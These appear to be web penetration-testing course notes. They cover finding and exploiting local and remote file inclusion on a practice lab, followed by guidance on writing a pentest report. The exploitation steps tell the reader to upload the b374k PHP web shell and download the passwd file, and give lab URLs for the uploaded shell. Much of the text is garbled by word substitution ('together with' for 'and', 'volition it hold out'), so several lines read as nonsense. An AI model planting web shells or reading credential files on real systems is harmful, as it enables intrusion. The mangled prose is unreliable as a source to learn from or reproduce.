1. LFI Discovery - usage the "Web for Pentesters" webpage position an LFI vulnerability manually or amongst ZAP.
2. LFI Exploitation - usage the vulnerable URL to read /etc/network file
SEE TEXT file!!!!
3. RFI Discovery - using the "Web for pentesters" webpage position an RFI vulnerability manually or amongst ZAP.
4. RFI Exploitation - 1 time the vulnerability is discovered upload the b374k software together with download the passwd file.
http://192.168.2.119/upload/images/b374k-2.8.php
http://192.168.2.119/upload/example1.php
MODULE 5
Report Creation 1
• What to include (Details)
- Planning, Assumptions, Objective, Methodology, Timeline.
- Affected assets, vulnerabilities establish (CVE-IDs), Impact, Attack Probability, Estimated Loss, Recommendations.
o Artifacts
• What to consider
o Audience
o Time
o Classification
• Supporting documentation
Report Creation 2
What to include (artifacts):
- images
- logs
- charts
- graphs
- packets
- code
What to consider (Audience):
- who are you lot presenting this to?
- how much do they ask to know?
- how technical are they?
- what are they allowed to know?
What to consider (Time):
- how rapidly does the written report ask to hold out completed?
- when volition it hold out presented?
- how long should the presentation be?
What to consider (Classification):
- what form of arrangement are you lot performing this evidence for? (government, large corporation, little company)
Supporting Documentation:
- have all supporting documentation consolidated together with brand it slow to deliver
- this includes together with is non express to the next (PCAPs, Nmap results, Fuzzer reports, cover captures, XML files)
Wrap Up
1. HTTP together with HTTPS basics
2. Why do spider web sites acquire hacked?
3. Hacker methodology
4. SQL injection
5. Cross site scripting (XSS)
6. LFI together with RFI
7. Reporting
HAPPY HACKING EVERYONE!!!!